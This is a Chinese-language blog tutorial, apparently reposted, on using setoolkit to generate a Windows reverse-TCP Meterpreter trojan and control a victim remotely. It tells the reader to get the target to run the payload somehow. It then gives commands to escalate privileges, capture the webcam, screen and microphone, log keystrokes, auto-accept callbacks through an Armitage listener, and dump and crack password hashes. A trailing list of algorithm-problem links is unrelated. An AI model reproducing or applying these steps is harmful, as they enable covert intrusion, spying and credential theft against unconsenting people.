• [可行]setoolkit生成木马软件远程控制实例


    [查看原文](http://www.cnblogs.com/AirCrk/articles/5845803.html) 1. 选1,social-ensineering attacks 2. 选4,create a payload and listener 3. 选2,Windows Reverse_TCP Meterpreter 4. LHOST 192.168.1.92 5. PORT 443 6. 得到~/.set/payload.exe

    想办法让目标运行payload

    1. 回车开始监控。
    2. meterpreter得到,可以使用以下命令,对目标机攻击,如果会话被关闭可以使用sessions命令查看当前可连接的会话,并用sessions -i 会话ID进行连接,使用quit命令可退出Meterpreter。

    getsystem 获取系统权限

    webcam_snap 尝试开启摄像头,下图提示目标没有摄像头设备。

    screenshot 获取目标屏幕截屏,如下图已经保存在了/usr/share/set下。

    record_mic -d 10 录制10秒钟声音

    keyscan_start 开启键盘记录

    keyscan_dump 查看键盘记录到的内容

    armitage可以设置自动上线监控

    1. 打开Armitage依次点击菜单中的Armitage--Listeners--Set LHOST,填写本机IP地址。
    2. 然后选择Reverse(wait for)设置端口和类型。这里我们填写443端口和Meterpreter类型。
    3. 配置好后点击Start Listener开始监听,此时msf会自动配置exploit模块。
    4. 此时目标主机开机并运行我们的Payload文件时,目标会自动出现在Armitage控制台界面内并被开启Meterpreter会话。
    5. 获取目标主机开机密码
      如果想获得目标主机开机密码,我们可以通过抓取Hash值的方法进行破解,步骤如下:
      在目标上右键依次点击Meterpreter--Access--Dump Hashes--registry method


    可以使用Ophcrack这类软件导入Hash值进行破解。

    在目标上右键依次点击Meterpreter--Access--Dump Hashes--registry method

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    POJ 1426 Find The Multiple(数论——中国同余定理)
    POJ 2253 Frogger(Dijkstra变形——最短路径最大权值)
    POJ 3790 最短路径问题(Dijkstra变形——最短路径双重最小权值)
    POJ 3278 Catch That Cow(模板——BFS)
    HDU 1071 The area
    HDU 1213 How Many Tables(模板——并查集)
    POJ 1611 The Suspects
    light oj 1214 Large Division
    POJ 1258 Agri-Net(Prim算法求解MST)
    POJ 2387 Til the Cows Come Home(模板——Dijkstra算法)
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6391389.html
Copyright © 2020-2023  润新知